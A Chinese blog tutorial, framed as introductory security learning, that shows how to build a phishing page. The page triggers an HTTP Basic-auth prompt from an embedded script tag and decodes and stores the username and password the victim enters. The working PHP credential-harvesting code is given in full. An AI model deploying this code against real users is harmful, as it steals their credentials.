一起来写个钓鱼

30次阅读

共计 2049 个字符,预计需要花费 6 分钟才能阅读完成。

虽然这篇文章的标题是一起来写个钓鱼的站点, 但是希望仅仅把它当作饭后的谈资就好, 切不可在实际生活中真正的使用。不然, 网络警察到你家查你水表的时候, 我可不负责任啊。而实际上要真心做到对应的效果很难, 只是作为安全知识的入门学习。
闲话少说, 还是直接进入主题吧。这里是需要实现的一些工具的清单:

  • PHP 5.x 及以上版本
  • 1 个现代的浏览器, 不要拿 IE6 这样老古董的浏览器出来, 会死人的
  • Apache 还是 Nginx 随意, 能用就好
  • 一款文本编辑器, 比如记事本

工具都准备妥当了, 那么就直奔主题了哦。老司机要开车了, 要坐好扶稳了。
在 Web 中钓鱼的方式有很多方式, 不过这个名字还是源自生活, 此时联想到在长江边垂钓的场景, 滚滚长江东逝水 …。
万事俱备只欠东风, 工具都准备好了, 现在还缺的就是鱼了。鱼从哪里来, 自然就是从受害者身上谋取啦。而这里我们利用 1 种 401 认证的方式来钓鱼。

实现过程

首先, 我们新建 1 个 index.php 的脚本, 其内容类似如下:

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title> 首页 </title>
</head>
<body>
    <h1> 首页 </h1>
    <script type="text/javascript" src="test.php"></script>
</body>
</html>

内容简单的很, 实际上真正有用的就是这么一行:

<script type="text/javascript" src="test.php"></script>

我们使用脚本的方式异步请求 php 的 1 个脚本。搞技术的要求能举一反三, 我见过一些信息安全人员, 除了会写 POC 外和使用一些工具外, 对应的原理是一窍不懂的。甚至为什么可以这样做是一问三不知的。
很多人以为黑客是群很聪明的人, 实际不然, 不排除这里面有一些所谓的脚本小子, 整天复制搞破坏的。
闲外话还是少说, 如果你觉得上面的 script 标签有点碍眼, 你完全可以换, 比如换成 link、img 等标签完全都是可以的。这就是举一反三的能力吧, 毕竟真实场景中很少有刚好就那么巧可以被利用的。
test.php 中的内容类似如下:

<?php
if(array_key_exists('HTTP_AUTHORIZATION', $_SERVER)){session_start();
    $value = $_SERVER['HTTP_AUTHORIZATION'];
    $admin = base64_decode(substr($value, 6));
    $_SESSION['info'] = $admin;
}else{header("Content-type: text/html; charset=utf-8");
    header('WWW-Authenticate: Basic realm="Please enter your username and password!"');
}

我们判断当前服务器中是否存在键名 HTTP_AUTHORIZATION, 如果不存在则直接抛出 1 个 401 的认证请求头。而浏览器获取到该 401 状态后, 会自动弹出 1 个对话框要求使用者输入用户名和密码。
如果使用者按照我们剧情的安排输入了用户名和密码, 那么我们就成功钓到了 1 条 (人) 鱼。
需要注意的是, 这里我们使用的是 Basci 认证, 而不是 HTTP 中另 1 个 Digest 的认证。不然到时传递过来的是 MD5 的结果, 还需要花费时间解密, 得不偿失。
眼尖的你可能发现, 我们使用的是 Base64 解码函数 base64_decode。没错,Basic 认证的用户名和密码会使用 Base64 进行编码, 直接获取到其内容进行解码即可, 是不是很简单。
在这里, 我们将其存入到 session 中, 以便可以在前端显示, 这样就可以看到效果了。而更多情况下, 是直接存储到文件或数据库中, 接着搞不好就拿着这些账号去登录你的银行卡。
为了看出效果, 我们在 index.php 中添加如下几行代码:

<?php
session_start();
if(array_key_exists("info",$_SESSION)){$value = $_SESSION['info'];
    var_dump($value);
}
?>

演示过程

下面是演示的效果过程, 首先是访问首页:

然后入套, 输入自己的用户名和密码:

鱼上钩了, 被钓了起来:

结语

看到, 你可能会骂娘了。这么简单的东西, 搞得这么神秘兮兮。
实际上, 原理的东西总是很简单的, 重要是组合利用。如果让自己隐匿的更深一些, 还有更具诱惑性才能让猎物上钩。而钓鱼的过程不就是利用如下几个切入点:

  • 诱饵味道做的很不错
  • 鱼钩藏匿在诱饵里面
  • 鱼肚子饿了
  • 鱼发现诱饵味道很不错, 就咬了一口

结果鱼就上钩了。而人之所以会被钓的过程主要还是如下几个情况:

  • 用户安全意识薄弱, 过于盲目相信浏览器
  • 浏览器厂商相关安全没有做好, 致使用户受害
  • 脚本小子页面做的很不错, 真假难辨

当然不排除还有其他一些情况, 实在想不出来了, 脑洞太小。
当然上面这么丑陋的网站, 百分百是钓不到鱼的。

正文完
 0